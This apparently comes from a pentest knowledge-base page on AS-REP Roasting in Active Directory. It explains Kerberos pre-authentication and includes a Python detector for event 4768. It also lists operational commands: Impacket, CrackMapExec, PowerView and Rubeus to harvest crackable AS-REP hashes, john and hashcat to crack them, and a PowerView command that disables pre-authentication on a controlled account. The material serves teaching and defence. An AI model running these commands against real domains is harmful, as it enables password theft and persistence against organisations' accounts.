# AS-REP Roasting

When requesting a TGT, the user must, by default, authenticate to the KDC (Key Distribution Center) before it responds. This is known as Kerberos pre-authentication: the user sends a timestamp encrypted with his Kerberos key to the KDC in the AS-REQ message (the request for a TGT).

When we talk about the TGT, the term is often a misnomer: what we actually mean is the **KRB\_AS\_REP**, which contains the TGT (encrypted with the KDC's secret) and the session key (encrypted with the user account's secret).

![](/files/kzqJ4yQN2CXesw51amER)

Because part of the KDC response (the session key) is encrypted with the client account's secret, it is important that this data cannot be obtained without authentication. Otherwise, anyone could request a TGT for a given account and attempt to decrypt the encrypted part of the **KRB\_AS\_REP** response offline to recover the targeted user's password.

However, on rare occasions, Kerberos pre-authentication may be disabled for an account (the **DONT\_REQUIRE\_PREAUTH** attribute is checked). As a result, pre-authentication is no longer required for these accounts, allowing an attacker to abuse this configuration.

![](/files/5I1rfA3sbJUYCycrObRy)

Thus, anyone can impersonate these accounts by sending an AS-REQ message, and the KDC will return an AS-REP response containing data encrypted with the user's hash.

Once in possession of the KRB\_AS\_REP response, the attacker can attempt to crack this hash offline and thus obtain the targeted victim's password in cleartext.

The AS-REP Roasting attack consists in identifying users for which Kerberos pre-authentication is not required and sending an AS-REQ on their behalf, in order to retrieve the data element encrypted with the user's hash in the AS-REP message. Once the data has been retrieved, an offline cracking attack is carried out to recover the user's password.

**It is important to note that pre-authentication is enabled by default and must be disabled manually.**
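From the defender's side, the signature of this attack is a successful TGT request (event 4768) with pre-authentication type 0, usually with RC4 (0x17) encryption, often for several users from the same source. The following is an added example, not code from this page: it runs that detection logic over constructed 4768 records (the field names follow the Windows Security event, the flat `key=value` layout is an assumption made for the example) and also checks the `userAccountControl` bit the page refers to.

```python
import re

# Constructed sample 4768 ("Kerberos authentication ticket (TGT) was requested")
# events, flattened to one line each. Values are made up for the example.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=alice IpAddress=10.0.0.5 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=svc_backup IpAddress=10.0.0.77 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0",
    "EventID=4768 TargetUserName=bob IpAddress=10.0.0.77 TicketEncryptionType=0x17 PreAuthType=0 Status=0x6",
    "EventID=4768 TargetUserName=dave IpAddress=10.0.0.77 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0",
    "EventID=4768 TargetUserName=carol IpAddress=10.0.0.9 TicketEncryptionType=0x12 PreAuthType=0 Status=0x0",
]

# userAccountControl bit DONT_REQ_PREAUTH (4194304, the value used on this page)
DONT_REQ_PREAUTH = 0x400000


def parse_event(line):
    """Turn one constructed 'key=value ...' line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_asrep_roast_candidate(ev):
    """A TGT actually issued (Status 0x0) without pre-authentication (PreAuthType 0).
    RC4 (0x17) is the classic crackable case (hashcat 18200), but AES responses can be
    cracked too, so pre-auth type 0 on a success is the trigger; etype is reported."""
    return (ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0")


def find_roastable_requests(lines):
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_asrep_roast_candidate(ev):
            etype = ev["TicketEncryptionType"].lower()
            hits.append({"user": ev["TargetUserName"], "src": ev["IpAddress"],
                         "etype": etype, "rc4": etype == "0x17"})
    return hits


def count_by_source(hits):
    """Distinct roastable users per source IP: several from one host is the enumeration pattern."""
    users = {}
    for h in hits:
        users.setdefault(h["src"], set()).add(h["user"])
    return {src: len(names) for src, names in users.items()}


def has_dont_req_preauth(uac):
    """Audit helper: is DONT_REQ_PREAUTH set in a userAccountControl value?"""
    return bool(int(uac) & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    hits = find_roastable_requests(SAMPLE_4768)
    print(hits)
    print(count_by_source(hits))
```

Feeding real 4768 events into `find_roastable_requests` requires only replacing `parse_event` with a parser for the export format in use; the decision logic stays the same.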

{% tabs %}
{% tab title="Linux" %}

#### [Impacket : ](https://github.com/SecureAuthCorp/impacket/)

```bash
python GetNPUsers.py <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile hashes_asreproast.txt
```

#### [CrackMapExec : ](https://github.com/Porchetta-Industries/CrackMapExec)

```bash
cme ldap <IP> -u <USERNAME> -p '<PASSWORD>' --asreproast hashes_asreproast.txt
```

{% endtab %}

{% tab title="Windows" %}

#### [PowerView : ](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)

```powershell
Get-DomainUser -PreauthNotRequired -Verbose
```

#### [Rubeus : ](https://github.com/GhostPack/Rubeus)

```powershell
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes_asreproast.txt
```

{% endtab %}
{% endtabs %}

### Cracking :

```bash
john --wordlist=passwords_kerb.txt hashes_asreproast.txt
hashcat -m 18200 --force -a 0 hashes_asreproast.txt passwords_kerb.txt
```

### **RedTeam POV:**

With sufficient rights (GenericAll/GenericWrite) on a user object, an attacker can set the "pre-authentication not required" flag on that user (4194304 = 0x400000 is the **DONT\_REQ\_PREAUTH** bit of `userAccountControl`; note that `-XOR` toggles the bit, so it sets it only if it was clear):

```powershell
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```

## References :

{% embed url="<https://beta.hackndo.com/kerberos-asrep-roasting/>" %}

{% embed url="<https://github.com/HarmJ0y/ASREPRoast>" %}

{% embed url="<https://zer1t0.gitlab.io/posts/attacking_ad/#asreproast>" %}

{% embed url="<https://www.thehacker.recipes/ad/movement/kerberos/asreproast>" %}


